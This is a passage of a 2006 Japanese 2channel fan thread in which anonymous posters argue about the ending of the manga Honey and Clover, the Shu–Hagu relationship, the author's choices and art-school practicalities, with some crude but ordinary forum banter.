結局、ちゃんと報われたのは真山だけか
これはあれか?恋愛はあんだけやれってウニノのメッセージか?w

102 :花と名無しさん:2006/07/31(月) 00:36:28 ID:???0
>>94
発売直後、ここで言えずにコーラススレで言ってる人達が結構いたよ。
雑誌移ってから一気読みした人とかが多いんだろうけど。

103 :花と名無しさん:2006/07/31(月) 00:40:42 ID:???0
>5人が別れに向かって進んでいる物語
その一言で、はぐ修エンドにほんの少〜しだけ納得できるようになった。
ありがとう

104 :花と名無しさん:2006/07/31(月) 00:44:07 ID:???O
とりあえず現実で野宮みたいな都合のいい存在がいなく、山田の様な思い出のある人間には、あんまり爽快感が得られない漫画だった…

105 :花と名無しさん:2006/07/31(月) 00:46:16 ID:???0
結局よくわからなかったんだけど
修はぐは恋愛絡むの?絡まないの?修の片想い?

106 :花と名無しさん:2006/07/31(月) 00:48:56 ID:???0
修に青春スーツを着せたかったから恋愛感情もってきたのかもしれないけど
それだったら途中で新しい女キャラでも出しとけば良かったものを…
美和子さんと接点をつくるとか最初から山田と伏線つくっておくとか。
親バカ設定をさんざんギャグ部分で利用しといて最後にいきなり大好きだ!って。

107 :花と名無しさん:2006/07/31(月) 00:49:29 ID:???O
>>102
2ちゃんじゃない某コミュでは感動の嵐!だったよ……
みんな、ハチクロサンド泣けた!最高!話の筋がブレずに描ききれていた!!!と…

108 :花と名無しさん:2006/07/31(月) 00:51:29 ID:???0
勢いで描いて収拾つかなくなって最終話で無かった事にした>修はぐ恋愛絡み

109 :花と名無しさん:2006/07/31(月) 00:56:36 ID:???0
修のアレは単純に30代後半〜40代な私(作者)だって青春してます・したいんです、って言いたかっただけなのかな・・・。

110 :花と名無しさん:2006/07/31(月) 01:03:14 ID:???0
>>98
同感。
自分は、兄マックスのアニメから入って、最近一気に既刊を読んでここまで来たんだけど、
このスレで語られているようなことはあまり感じなかった。
はぐの怪我の巻から、秋から冬って感じで、青春と夢の崩壊ってカタルシスが面白かったし。

この話、キャラに自己を投影して読んでいると、きついんだと思う。
文学的な美しさとかを客観的に楽しめば、この話はあるべきところに収まっているし、
面白かったと思うよ。
大団円だ。

111 :花と名無しさん:2006/07/31(月) 01:04:33 ID:???0
>>109
ここのネタバレ文しか読んでいないんだけど、そうではなく先生も救ってあげたかったんでは
ないかと思ったりします。



112 :花と名無しさん:2006/07/31(月) 01:05:27 ID:???0
>>104
なんで飲み屋みたいなのにしたんだろうな。
新たな恋をするにしても、なんで劣化(進化?)真山なのかと。
山田みたいな女の子は同じような男を好きになるですよ的な話にしたかったのか知らんけど、
気持ち悪さがあったなぁ。

113 :花と名無しさん:2006/07/31(月) 01:06:56 ID:???0
ようは雰囲気まんがって事?
あまり追求せず匂いを楽しむみたいな

114 :花と名無しさん:2006/07/31(月) 01:08:07 ID:???O
>>110
キャラに自己を投影して読んだことないな。
絵と描写だけ好きで何となーく読んでました。

115 :花と名無しさん:2006/07/31(月) 01:08:37 ID:???0
>>108
絶対それだよね

116 :花と名無しさん:2006/07/31(月) 01:08:57 ID:???0
ほめてる人はどっちと解釈してるんだろう。
「好きさ、大好きさ」「おめでとー!」の時点では明らかに恋愛フラグが立ってたのに
次号では野宮には違うようなこと言わせて、最後はほとんどスルーでしょ?
恋愛モードで喜んでいる人と、違ってよかったって喜んでいる人と
ふた通りいそうな気がする。どっちでもいける最終回だから。

自分は、ウミノさん、ここまでお花畑の人で
今更>>108のようなことをしたとは思えないんだよなぁ。
素で修はぐを恋愛にしてるんだと。

117 :花と名無しさん:2006/07/31(月) 01:10:03 ID:???O
>>112
あゆはメガネ萌えだからという説が出ていた

118 :花と名無しさん:2006/07/31(月) 01:12:07 ID:???0
“花本先生へ
ゴキゲン如何でしょうか?
君宛ての手紙となるとキツイ事ばっかりになりそうで困るのだが・・・
(中略)
私はもっと前向きで生命力に溢れた生々しい姿が見たい。
(中略)
そうだ!!恋だ!!恋をしたまえ!!相手を見つけられないとなったら
羽海野さんいに描いてもらえ!!
たまにはいつも着てる白衣を脱ぎ捨て ピシッとした格好して、
ん〜オレにはよーわからんが おっしゃれ〜なデートスポットにでも行きやがれ!! 
フ〜 あと タバコ吸いすぎだよ〜
藤原啓治”

(ハチクロ公式アニメガイド〜キャストからハチクロメンバーへの手紙〜より抜粋)
これにお応えしたくなったんかな?・・・なんてな。

119 :花と名無しさん:2006/07/31(月) 01:15:49 ID:???0
>>118
こんなのがあったんだーw
そう、これが普通の人の反応だと思う。

120 :花と名無しさん:2006/07/31(月) 01:15:49 ID:???O
>>110
だから他でもなくキャラに自己投影しすぎてた作者が
最後1番きつかったのか
ギャップ埋めようとして無理通れば道理引っ込む状態に
まあ、その苦しみも終わりだねお疲れ

121 :花と名無しさん:2006/07/31(月) 01:17:40 ID:???0
最終回でハチクロは竹本の成長記だったんだ
と自分なりにオチはついた。
その日たまたま映画も見てきたんで
スピッツの「魔法のコトバ」と
シンクロしてなんだかすごく泣けたんだ。

122 :花と名無しさん:2006/07/31(月) 01:18:34 ID:???0
なんで語り口調

123 :花と名無しさん:2006/07/31(月) 01:22:35 ID:???0
うんこ

124 :花と名無しさん:2006/07/31(月) 01:24:41 ID:???O
>>116
素で決定しようとしたけど
森田→これで終わったわけじゃない!
あゆ→はぐは森田が好きなはず
竹本→先生に返す必要はない
のコンボが勝手に出てきてこりゃ無理だと思ったんでしょ
解釈は自由が精一杯何だろうし、もうそれでいいと思う。

125 :花と名無しさん:2006/07/31(月) 01:25:35 ID:???O
>>122
竹本だから

126 :花と名無しさん:2006/07/31(月) 01:25:38 ID:kkw4SA390
>>121
魔法のコトバはタケノコのことじゃななくね?
はぐ森の別れてても心は通じてる、いつか会えるよってことだろ。

127 :花と名無しさん:2006/07/31(月) 01:26:45 ID:???0
>>118
いつも着てる白衣を脱ぎ捨て ピシッとした格好して、
おっしゃれ〜なデートスポットに行ってる花本修司か。
で、その隣にははぐみが・・・?
自分的には好きな画だけど
実際やったらギャグにしかならんなw


128 :花と名無しさん:2006/07/31(月) 01:30:09 ID:???O
気持ち悪い話だけど、はぐって性的な知識があるのか?
週がモンゴル行ってひとりで夜過ごす時に、竹本が帰ろうとするのを無邪気に泊まってという19才って……



129 :花と名無しさん:2006/07/31(月) 01:31:54 ID:???0
>>128
それこそ追求しちゃいけないところでしょ。

130 :花と名無しさん :2006/07/31(月) 01:32:41 ID:???0
森田→マサルさん
修→ひろし

どっちもやだ
でもたけのこもやだ

131 :花と名無しさん:2006/07/31(月) 01:32:56 ID:???0
>>128
まぁそれなりにあるんだろうが >知識
相手(竹本)を見て自分の行動を計算してるんだよ。

もしくは知識はあるが常識が無い。

132 :131:2006/07/31(月) 01:34:10 ID:???0
ゴメソ リロってなかった
次の話題ドゾー

133 :花と名無しさん:2006/07/31(月) 01:36:42 ID:???0
>>128
俺は、メンヘル22歳の娘に無邪気にそう言われたよ。
で、泊まった。
下心はあったんだけどなあ。






実際は鬱な話を聞かされるだけ。
気が付いていたら眠っていたよ。とほほ。
まあ、その娘がリアルで、はぐみたいな娘だったら、
絶対ヤっていたけどね。

134 :花と名無しさん:2006/07/31(月) 01:38:18 ID:???O
>>133
ロリコンですか?

つか、はぐはメンヘルじゃないんじゃ

135 :花と名無しさん:2006/07/31(月) 01:41:45 ID:???0
はぐって、メンヘルそのものだと思うよ。

136 :花と名無しさん:2006/07/31(月) 01:44:27 ID:???O
>>135
メンヘルの定義がワカラン。

はぐは空気読めない、自己中で繊細で偽善的というイメージ

137 :133:2006/07/31(月) 01:45:02 ID:???0
あつ、おれ、子供好きです。

ても、はぐって、ロリヲタ受けしないキャラだよ。
頭の中の発想とか思考回路は幼稚だけど、
自分の目指す方向性だけはきちんと見つけている。
それと、萌え要素を微妙にすべて外してある。
エロ同人誌には使いにくいタイプだよ。



138 :花と名無しさん:2006/07/31(月) 01:45:52 ID:???0
メンヘルに夢見すぎw

139 :花と名無しさん :2006/07/31(月) 01:46:36 ID:???0
構ってもらって嬉しくて増長したキモヲタ



140 :花と名無しさん:2006/07/31(月) 01:47:17 ID:???0
メンヘル→メンタルヘルス

最近はこの略称で呼ばれることが多い。
元来の「メンタルヘルス」は「心の健康」という意味である。
しかしこの言葉は主に、精神病(鬱病を含む)、
神経症(ノイローゼ)、心身症など、さまざまな心の病によって
生活に不自由をきたしている人々、あるいはそれらの症状を指す。

現在におけるさまざまな病のうちでも、
最も深刻な病のひとつであり、時代が生んだ病気と言えるだろう。

141 :花と名無しさん:2006/07/31(月) 01:48:34 ID:???0
わざわざ乙。

142 :花と名無しさん :2006/07/31(月) 01:50:59 ID:???0
たけのこも料理凄く凝った美味しい物色々作れるし
手先が器用だしそこそこ評価も高いし
凡人よりよほど才能あると思うんだが
はぐと森田が別次元で天才過ぎるのか
でも天才の定義がわからん
はぐの絵ぐちゃぐちゃに見えるし

143 :花と名無しさん:2006/07/31(月) 01:53:30 ID:???O
>>126
タケノコってw
でもこのタイミングで言魂を歌ってくれたスピッツには感謝感謝
言魂も大事だよな
それに溺れるとろくな人間にならないし、女の子はやっぱり見た目が1番重要だけどね

144 :花と名無しさん:2006/07/31(月) 01:55:05 ID:???0
>>142
そんなに、たけのこの才能について真剣に考えなくてイイと思う。

はぐ 森田  S級
真山 山田  A級
臭 たけのこ B級
142      D級

ぐらいの才能偏差値と了解しておけば宜しいかと。

145 :花と名無しさん:2006/07/31(月) 02:01:22 ID:???0
大して盛り上がってないな。

146 :花と名無しさん :2006/07/31(月) 02:04:29 ID:???0
ツマンネ

147 :花と名無しさん:2006/07/31(月) 02:08:45 ID:kkw4SA390
>>144
臭とタケノコにCは評価しすぎ。
はぐ 森田 SS級
藤原兄弟   S級
リカ 野宮  A級
真山 山田  B級
臭 たけのこ C級
142      E級

148 :花と名無しさん:2006/07/31(月) 02:10:56 ID:???O
C級は、絵がそこそこ上手い普通の美大生レベルか。


149 :花と名無しさん:2006/07/31(月) 02:29:26 ID:???0
>>148
でも、(何巻で出てたかは忘れたが)
修のデッサン、あれは美大生としてはヒドい方かと

150 :花と名無しさん :2006/07/31(月) 02:30:52 ID:???0
腐女子って男ヲタよりもかなりたち悪いよな。
どうせまともに男と付き合った事も無いようなブサ女なんだろ?
ブサ女程、恋愛漫画にケチつける。

「私なら絶対こんな男嫌!」とか言ってみたりなw
激しく安心しろ。
お前らみたいなブサ女に言い寄る男なんて居ないから。

151 :花と名無しさん:2006/07/31(月) 02:34:50 ID:???0
>>149
あのデッサン能力でよく東京の美大に合格できたもんだと思うお。>修
まぁ、そういうとこツッコミだしたらキリがないのはわかるがw

ていうか、今日は一体何の日だ?

152 :花と名無しさん:2006/07/31(月) 02:39:38 ID:kkw4SA390
>>151
え?ひょっとしてカレーの日?

153 :花と名無しさん:2006/07/31(月) 02:40:21 ID:???0
質の悪い燃料がチラホラ投下されてるけど
それでも回復しないこの盛り下がりっぷり…
つい先日最終回を迎えた漫画の本スレとは思えんw

154 :花と名無しさん:2006/07/31(月) 02:41:51 ID:???0
>>152
そうであってほしいw

155 :花と名無しさん :2006/07/31(月) 02:42:27 ID:???0
凡人は天才を描けないのか
デスノやハチクロ等の天才設定に突っ込み出すときりがないが
というかこれほとんどギャグ漫画だろ

156 :花と名無しさん:2006/07/31(月) 02:44:20 ID:???0
むしろ、「贅沢なギャグ漫画」と思って読んだほうが良いかもな

157 :花と名無しさん :2006/07/31(月) 02:44:44 ID:???0
結局ハチクロは人気なんだなと。

158 :花と名無しさん:2006/07/31(月) 02:45:54 ID:???0
そら、大ヒット作だもの。

159 :花と名無しさん:2006/07/31(月) 02:57:57 ID:???0
十分に盛り上がっていると思うよ。ある意味では。
前スレも三日間で消化しているじゃないの。

てか、153のように鬱々した書き込みするヤツが、
ウザいんじゃないの。
いまどき"w"を末尾に付けられてもなあww

160 :花と名無しさん:2006/07/31(月) 03:41:10 ID:???0
びっくりするくらいのクソ漫画

161 :花と名無しさん:2006/07/31(月) 04:28:35 ID:???0
最終話の話自体は上手くまとめたとおもうけど、
前話からのはなしがバッサリとカットされているから、中途半端な感じな否めない。
アニメへのストーリー出しの関係なのかな。(時期的にそれも違う気がするが)
修がはぐに対して恋愛感情を抱く事自体は悪くないのだが、
告白(発言)から最終話までが短すぎたので、細かい描写がない&唐突過ぎて中途半端さが残った。
アニメではどうするのかね。こんな状態ならスルーしてほしい。
「ガラスの仮面」の42巻のようにコミックスで完全描き直しを希望したいけど、
既に10巻の発売日も決定しているらしいから単行本描き直しはなさそう。
せめてセリフは直して欲しいな。



162 :花と名無しさん:2006/07/31(月) 04:37:24 ID:???0
前スレではとうとう、
修の恋愛感情発覚が無かったことになってるコラが
出回ってたよな…

163 :花と名無しさん:2006/07/31(月) 04:50:21 ID:???0
ふと思った。
最終回ではぐが臭にお返ししなきゃと言ってたが、
その前に森田に300万返せってw
…でも多分、臭は森田から300万受け取ったことを
はぐには話していないんだろうね。
(つーか、作者脳内で、ないことになってそう…)

164 :花と名無しさん:2006/07/31(月) 04:59:32 ID:???O
未来氏ィでは大絶賛されてたよ。普通の読者にはたいして問題ないのかな。。

165 :花と名無しさん:2006/07/31(月) 05:29:37 ID:???0
62話で森田から300万借りるエピソード
63話で真山に生活費の心配をされ「オレけっこうしぶといんだよ(にやり☆)」

この2つのエピソードって、互いにどういう位置づけ?
(というかそもそも関連性ナッシング?)
作者はどういうつもりで描いてんの?

ちなみに62話で修が森田から受け取ったお金、
あの札束の厚みから言って、“全部で”300万どころか
“一束につき”200万超えててもおかしくない。



166 :花と名無しさん:2006/07/31(月) 06:34:44 ID:???0
ピン札とは限らんよ

167 :花と名無しさん:2006/07/31(月) 06:37:28 ID:???0
無理やりな鬱エンドって読者への嫌がらせに近いよな・・・
書く気が無いなら適当にハッピーエンドにしとけよ

168 :花と名無しさん:2006/07/31(月) 08:00:26 ID:???O
適当なハッピーエンドって.....

169 :花と名無しさん:2006/07/31(月) 08:00:51 ID:???O
ある意味作者が
鬱に陥ったあげくの
適当なハッピーエンドなわけだから
もうこれでいいんじゃないの
むしろよく頑張ったよ
誰も死ななくて本当によかったわ

170 :花と名無しさん:2006/07/31(月) 08:50:58 ID:d4I24/cW0
なんかはぐちゃんが腕動かなくなってから
たけのこ難病の子に恋してるやつみたいでウザかった

森田ってwww

171 :花と名無しさん:2006/07/31(月) 09:14:53 ID:???0
>>164
ここにいるのもまた普通の読者じゃないんかな…

172 :花と名無しさん:2006/07/31(月) 09:20:18 ID:???O
>>171
なんていうか、ここにいるのは漫画に詳しい漫画好きな人じゃないかなと
あそこは批判意見が書きにくいってのもあるんだろうけど、あまりにここと違いすぎてさ…

173 :花と名無しさん:2006/07/31(月) 09:24:07 ID:???O
>>49
きんもー☆
許容しろってのは批判するなってか

男ヲタの方が痛いファビョり方すんだろ

174 :花と名無しさん:2006/07/31(月) 10:24:00 ID:???0
月刊誌はリアルタイムで付き合うと期待感が増すから否応なくこういう事になる。
多分、初見の人が一気に全部読むと途中何かが引っ掛かる程度で済んでしまうんだろう。
リアルタイムの人は、その「引っ掛かる」を一月丸々抱え込むのだが。

175 :花と名無しさん:2006/07/31(月) 10:38:13 ID:???O
先生の急な発情は
今となってはリアルタイムで読めてラッキーだったな
スリリングで面白かったわ
赤ずきんちゃん逃げて逃げて!みたいな

176 :花と名無しさん:2006/07/31(月) 10:51:21 ID:x83jjf7S0
ハチクロの9巻はまだ?

177 :花と名無しさん:2006/07/31(月) 10:59:42 ID:???0
>>175
同感。コミックより衝撃大きいし
あれはあれで「祭」だったのかなと。
ウミノ先生のプレゼントと解釈しました。

でもスピンオフでまだ森はぐの可能性を夢みてしまう。

178 :花と名無しさん:2006/07/31(月) 11:05:41 ID:???O
>>177
みんな意外と抵抗ないんですね

はぐがロリすぎて違和感があります…。

179 :花と名無しさん:2006/07/31(月) 11:06:20 ID:???O
>>150
それはお前のことだよ

180 :花と名無しさん:2006/07/31(月) 11:19:25 ID:???0
>>178連載時は発狂ものだったよw
でもね。それも含めて「楽しんだ」わけで
それはそれでアリかなぁって思うわけ。

181 :花と名無しさん:2006/07/31(月) 11:26:55 ID:???O
>>180
そうなんだ、なんか私は元々はぐのロリな性格とかがヨシと思えないから、余計にダメなんかな〜…
依存的なとこも

182 :花と名無しさん:2006/07/31(月) 11:47:22 ID:???0
森博嗣のブログの7/6付にウミノさんが名古屋に来た時の話があって

> 「ハチクロ」はもうすぐ9巻が出て、またすぐ10巻が出るらしい。

とあったし、9月か10月くらいに出るんじゃないかな。
書下ろしがあるんだっけ?間に合うのかね?

183 :花と名無しさん:2006/07/31(月) 11:51:40 ID:???0
ごめん、182は誤爆

184 :花と名無しさん:2006/07/31(月) 11:52:49 ID:???O
今映画見てきた。

自分以外客いなかったorz

185 :花と名無しさん:2006/07/31(月) 11:57:53 ID:???0
話の展開に色んな意見あってそれは当然なんだけど、
作者が役者に萌えてクソ展開に変えたとか鬱になって適当に終わらせたとか、
そういう事本気で言ってる奴は物創る才能が無いうえに頭が悪い。

いいエピソードいっぱいあってこれだけ売れて人気あって、
アニメ化も映画化もされた作品を作者がおざなりにするわけがない。
物語を作る時、とって付けたような展開で話を引き伸ばしてるようなもの以外
話のラストを考えるという行為は楽しみのひとつだという事がわかってない。

打ち切りにならずに自分のペースでラストまでいける話は、
大抵はそこに至るまでに何回も反芻して少しずつ磨いていって、
他人にどう思われようと少なくとも自分で納得いくものに仕上げる事はできる。
これだけ大きくなった愛着も周囲からの責任もあるだろう作品に対して、
当初と多少の変更があったとしても手を抜くなんて事は簡単にできるもんじゃない。

インタビュー見ると作者は謙虚な人なんだろうと思う。まぁ話した事も
会ったこともないから全然知らないけど。そんな印象。こんなに大きくなったこの作品は
私だけじゃなくみんなのハチクロなんですよ的な、作品に傲慢になれない面が見て取れる。
確かにそういうものを創るうえで弱いともとれる作者の姿勢は否めないが、
同人出身だから話のまとめ方がとかキャラがどうとか言ってる奴は相当な才能があるか
ものを創る才能が全くない妄想だけで語ってる馬鹿としか思えん。

要するに作者の作品に対する姿勢けなしてる奴は本気で何か創った事あんのかと言いたい。

186 :花と名無しさん:2006/07/31(月) 12:03:48 ID:???0
>185
まあまあ。
半分くらいは気持ちわかるけど、そこまで言っちゃ人に伝わらないよ。

187 :花と名無しさん:2006/07/31(月) 12:10:46 ID:???O
>>177
いやあ、それは酷でしょう
竹本に、森田はぐのベッドシーンモチーフに作品造れって言うようなもんの気がする

これだけ可能性があるだけでも奇跡だよ
とりあえず、それでよしとしましょうや
作者もよく頑張ったよ
根はいい人で助かった

188 :花と名無しさん:2006/07/31(月) 12:11:51 ID:???0
>>185
うむ。気持ちは解るがここで何を言っても無駄。
それが伝わる様な相手だったら、
作品を読んだ時点で気付いてる。

189 :花と名無しさん:2006/07/31(月) 12:14:10 ID:???0
>>185
とりあえず一番もちつくべきはおまいさんだ。茶でも飲め。
というか製作者が客に向かってそれを言ったらお終いなんだよ。
そういう部分を考えないのが客なんだから、な?

これはゲームのリメイクにしても何にしても言えることなんだが、
元から何も期待されていない作品には誰も何も言わないわけで。
例えば超名作シリーズに対して客はもう「普通に面白い」レベルなんて求めてないんだよ。
今までの功績が逆に、その作品単体としての評価を辛めにさせてしまう状態っていうやつな。

だからこそ、ハチクロに対しては皆期待してたし本気で楽しんでいたんだと思うよ。
でも、その期待度に反して出来が予想を大幅に下回ってしまったからこそ失望も深いんだってこった。
これはどの売れた作品もが抱える「業」みたいなもんだからあまり気にすんな。

190 :花と名無しさん:2006/07/31(月) 12:30:03 ID:???0
10巻にはなが〜い後書き(言い訳)が付きそうだね

191 :花と名無しさん:2006/07/31(月) 12:38:37 ID:???0
役者に影響受けているのは本人が言っている事なんだが…

192 :花と名無しさん:2006/07/31(月) 12:41:48 ID:???O
これだけ反響があるっていう事は、終わり方云々はどうあれすごい作品だったんだね。
と思う。

すごいというか何というか。
心に残る漫画だったな。

193 :花と名無しさん:2006/07/31(月) 12:42:43 ID:???0
>>187
ベッドシーンじゃないけど、はぐが竹本に
「ねえ竹本くん、大きなベッド作って〜!2人で寝れるようなの!!」
とおねだりするのを想像してしまった。

194 :花と名無しさん:2006/07/31(月) 12:45:26 ID:???O
>>185
有名で売れてるけど、キャラ萌えで駄目になったなんていくらでもある
ハチクロもその仲間入りをするなんてな…

つーかわかりやすくキャラ萌えと言うだけで、
読者が読んだ時どう見るのか、客観性を失ってしまっているのが問題
プロなんだから批判も受け入れなきゃいけないよ

195 :花と名無しさん:2006/07/31(月) 12:46:23 ID:???O
自由に描いてんだから
自由な感想言ってもいいじゃん
真実じゃなければあたらないから大丈夫だよ
それが、言弾ってもん
遠藤カンナには弾はあたらないのと一緒

196 :花と名無しさん:2006/07/31(月) 12:48:33 ID:???O
有名でもキャラ萌えで駄目になるというか
有名になったからキャラ萌えに歯止めがきかなくなるというか

197 :花と名無しさん:2006/07/31(月) 12:52:11 ID:???0
ここの人達は「役者に影響を受けた」という舞台裏を知っているから
まだ何とか自分を納得させられるだけの材料を持ってはいるが
普通にコミックだけであの展開を見せられる人にとっては「・・・え?」って感じだろうな。

198 :花と名無しさん:2006/07/31(月) 12:55:22 ID:???O
近親相姦はマニアックすぎる

199 :花と名無しさん:2006/07/31(月) 12:56:52 ID:???O
肉親って時点でアウト

200 :花と名無しさん:2006/07/31(月) 13:01:16 ID:???0
映画の影響受ける前に海を渡った真山・理花。
そもそも映画に出ていない野宮。
映画の影響それほど受けなかった山田。
 
以上の連中が勝ち組って事ですね?
 
…まんまストレート成立した連中ばっかりですね。

201 :花と名無しさん:2006/07/31(月) 13:25:55 ID:Q+jfXLKk0
あらゆる意味で伝説の作品となりましたな。ウミノたん乙。

202 :花と名無しさん:2006/07/31(月) 14:27:04 ID:???O
やることないし、今秋にやる番外編の予想でもするか。
いきなり最終回から4年後の話。主役は高校生になった倉持君で、ある時美術館で偶然はぐと再開する。
リハビリも成功して、展示できる作品もつくれるまで回復したらしい。前より少し大人っぽくなったはぐに照れる倉持だが、彼女の左手の薬指にはめてあるものを見て複雑な気持ちになる。
はぐは彼にとって初恋の人だったからだ。


203 :花と名無しさん:2006/07/31(月) 14:31:40 ID:a7AcVmkD0
>>202
ありそうww

204 :花と名無しさん:2006/07/31(月) 14:33:21 ID:???O
>>185

また厨が来たよ。
じゃあお前は出来るのかってのはリア消の言うセリフだぞ。
そう言うお前は頭が良くて物をつくる才能があるんだよなぁ?

作者と読者は立場が違うんだよ。作り手が一度世に出したものは受け手の判断に委ねられるんだよ。だから文句がある奴だって出てくるだろ。
結局批判するなって言ってるよそれは。
作者が頑張ったからとかいい人だから批判は駄目なんてどんな世界の話だよ。
判断するのは作品だよ。
誰にも文句言われたくないならそれこそチラシの裏だ。

作者の役者萌えもミーハーで振り回されるのも本当だし、
事実話がグダグダじゃないか。
「するわけがない」ってのは違うぞ。作者の気紛れや会社の事情でおざなりにされた作品なんて山のようにあるし。
わかってないってお前はどんなお偉方なんだよw
お前はかなりのもの知らずで勝手に夢のような性善的な妄想を膨らませてるようで……
せめて情報は仕入れようね。

そして最後に作者または信者の布教活動乙

205 :花と名無しさん:2006/07/31(月) 14:44:42 ID:???O
作品ってのは作者の自己満足な面もあるけど
会社から商売として流したからにはお金を出して作品を買った読者は
色々言うことくらいしてもいいよな。
別にお客様は神様じゃないけどさ、うみのセンセは
読み手も書き手も対等な仲間意識でできた同人誌の世界で許される緩さをプロの世界に引きずったってことだろうね。
そんな同人出身の漫画家は多いけどさ。

確かに>>185は夢みたいなこと書いてるから夏厨かな?

206 :花と名無しさん:2006/07/31(月) 14:51:24 ID:???0
山田が真山を、真山がリカを、あそこまで恋い焦がれる状態に至る
理由にもっと触れられていたらなー。山田なんて、なんで真山が
好きなのか自分でもわからないってビービー泣いて森田にポカリ
もらってたシーンあるじゃん。
そんなあやふやなのに、まるで真山を好きでい続けることが自分の
存在理由だみたいな極端なとこに行かせるには、説得力が全然無い。
恋に恋、もしくは悲しい片思いしてる自分に陶酔してるだけに見える。

修はぐの「境目」はもうどうでもいい…。


207 :花と名無しさん:2006/07/31(月) 14:52:06 ID:???0
山田が真山の会社から皿の注文受けて、作って渡してましたが
制作は大学内でやってましたよね。
お皿作った粘土とかはちゃんと自分で購入したものなんでしょうか
商品作りの為に大学の窯使っても別にOkなんですか?

208 :花と名無しさん:2006/07/31(月) 14:58:24 ID:???0
>>185
気持ちは分かる。
だがこういったシーンにおいて、安易な精神論を持ち出すのは
無謀行為に他ならない。
諦めるか、もうちっと別のアプローチを試みてみてくれ。
自分はそこまでやる気は無いんでね。

>>202
スピンオフは山崎&美和子主軸の、
藤原設計事務所関連に照準当てたエピソードだと聞いたんだが。
だが倉持君も良いな。
はぐ(+修)は、留学で海外に飛んでそうな予感。


209 :花と名無しさん:2006/07/31(月) 14:58:30 ID:???0
>>206
「『前の男』を好きでい続けることが自分の存在理由だみたいな極端なとこに行かせる」
のは山田も理花も同じ手口。
で、結局次の男と一緒に未来へ進むのも同じオチ。
つまり、単純にウミノさんはこれしか書けない可能性有り。

210 :花と名無しさん:2006/07/31(月) 15:08:05 ID:???O
>>207
材料費くらいは貰ってるだろ
窯は自分の作品と混ぜて焼いてたりして…

211 :花と名無しさん:2006/07/31(月) 15:08:55 ID:???0
作り手たるもの、叩かれ批判されてナンボの商売です。
それだけ多くの人に興味をもたれているってことだもんね。
作り手側にとって一番恐いのはスルーされること。無関心が一番恐いと思う。
誰からも批判されない完璧な作品を作り上げられる作り手なんていない。
批判や叩きを己の糧にできる器をもたない人は、モノ創りの世界にはいられない。
そうゆう葛藤も仕事の内。


212 :花と名無しさん:2006/07/31(月) 15:11:22 ID:???0
>207
うちの大学だと窯は「空いてれば」どんどん使ってよかったよ。
そうやって作りためた作品で個展する子もいたし
もちろん土や釉薬は自分(orスポンサー)が買ったのをつかってだよ

213 :花と名無しさん:2006/07/31(月) 15:20:47 ID:???0
>>212
意外と現場は融通効くもんなんですね。
山田のアイディアも実際に武蔵美にそういう実例がいたからだろうか?

214 :花と名無しさん:2006/07/31(月) 15:29:40 ID:???0
成形だけならともかく「焼き物」で作品を数つくってこなすには焼かないとダメだからねぇw

215 :花と名無しさん:2006/07/31(月) 15:35:05 ID:???0
>>206
この作品、相手を好きになる理由がある人なんて
ひとっこ一人いやしませんよ。

森田、たけのこはひとめぼれで、はぐの容姿に惚れたけど
他は一切なし。
飲み屋もなんでかなー

216 :花と名無しさん:2006/07/31(月) 15:52:36 ID:???0
>>212
作品中にそういう事の説明的な場面あっても良かったのにね

217 :花と名無しさん:2006/07/31(月) 15:55:02 ID:???O
男→女の場合、好きになるのに外見は重要なんだよ
リカ山田はぐは各々個性派美人・可愛い設定だから理由になる
山田は初恋引きずる地雷女

218 :花と名無しさん:2006/07/31(月) 15:59:09 ID:???0
擦り込みに近い恋が描きたかったんじゃない?
ヒヨコだっけ?初めて見た動くものを親だと思いこんじゃうっていうの
それですり込みからの脱出組が山田でそのまま埋没が真山

219 :花と名無しさん:2006/07/31(月) 16:00:07 ID:???0
>>213
武蔵美だけじゃなくて
けっこーどこでもそうだよ

220 :花と名無しさん:2006/07/31(月) 16:03:31 ID:???0
じゃあ山田みたいな出世コースってあながち嘘じゃないんだな。

221 :花と名無しさん:2006/07/31(月) 16:10:55 ID:???0
>207
なんか大誤解してそうだから敢えて
美大って授業で作品作るのも自主制作も基本的に材料費は自分持ちよ〜?
学校はハコ(制作場所や窯)や指導者を出してくれるのw


222 :花と名無しさん:2006/07/31(月) 16:12:36 ID:???0
真山の心が潰れる音イベントは…そりゃ大抵の男はオチるだろ。刷り込みと言うには重すぎる。
それであそこまで面倒見れるかは別として。
 
昨日のあるある大辞典見る限り、理花は納豆含む発酵食品大好き女と見た。

223 :花と名無しさん:2006/07/31(月) 16:22:24 ID:???0
>>221
作品ないに科の予算で買った信楽なんちゃら土を
ばんばん使って教授が泣いてたエピがあるからなぁ。

224 :花と名無しさん:2006/07/31(月) 16:22:53 ID:???0
>>221
あれ??
なんか山田が信楽なんとか土ってのを使おうとしたとき
「科の予算がぁぁ?!」
ておじちゃん言ってたけど
アレはなんなん??

225 :花と名無しさん:2006/07/31(月) 16:24:39 ID:???0
かぶってるしw
土の名前のあやふやさもw


226 :花と名無しさん:2006/07/31(月) 16:30:23 ID:???0
そう言えば、あの時ってOB用の土産を頼まれて作っていたんだっけ。
でも土は別の目的の為に取って置いたんだよね?

227 :花と名無しさん:2006/07/31(月) 16:32:37 ID:???0
206ですが、すべてに理由が欲しいわけじゃないし、個人的な意見ですから。
竹本と森田のはぐへの一目惚れは別にいいんだ。そのシーンが描かれているんだから。
でも、山田→真山と真山→リカは、あんだけページ数割いて執拗に描かれて
いるわりに、スタート地点が見えない。
インプリンティングにしても、キッカケは必ずあるでしょ。
なぜそこまで相手に想い入れるのかのくだりがあれば、も少しキャラの
暴走・意固地ぶりを正当化(ちょっと違うかな?)出来たかな、と。

228 :花と名無しさん:2006/07/31(月) 16:33:40 ID:???0
科の規模や教授のえらさwの権限によるけど
共同制作や「科展」用に使う特別な素材を科の予算で買うってのはある。
それを個人で流用しようとしたからダメ出汁喰らったんじゃ?

でも実際はそういう資材でも一定期間過ぎたら個人作品作るのに使っちゃうけどねw

229 :花と名無しさん:2006/07/31(月) 16:35:20 ID:???0
>>224
何かそんな場面あったよね。
だから学校の土勝手に使って良いの?と疑問に思った。

230 :花と名無しさん:2006/07/31(月) 16:36:56 ID:???0
>227
ウミノサン儲ではないですが、ハチクロ前半は大好きだったので言いたい。
あの手のインプリンティングって正に脳に刷り込み状態で
はっきりした形の「原因」が無いからよけいに出口が見つからなくなるってあると思う。
原因がわかれば解除方法を考える手がかりもあるだろけど

231 :花と名無しさん:2006/07/31(月) 16:39:45 ID:???0
真山×山田と真山×理花じゃ圧倒的に後者の方が情報量多いと思うけどな。
山田の方は情景描写と山田個人のポエムは膨大だったけど、肝心の情報は少なかった。

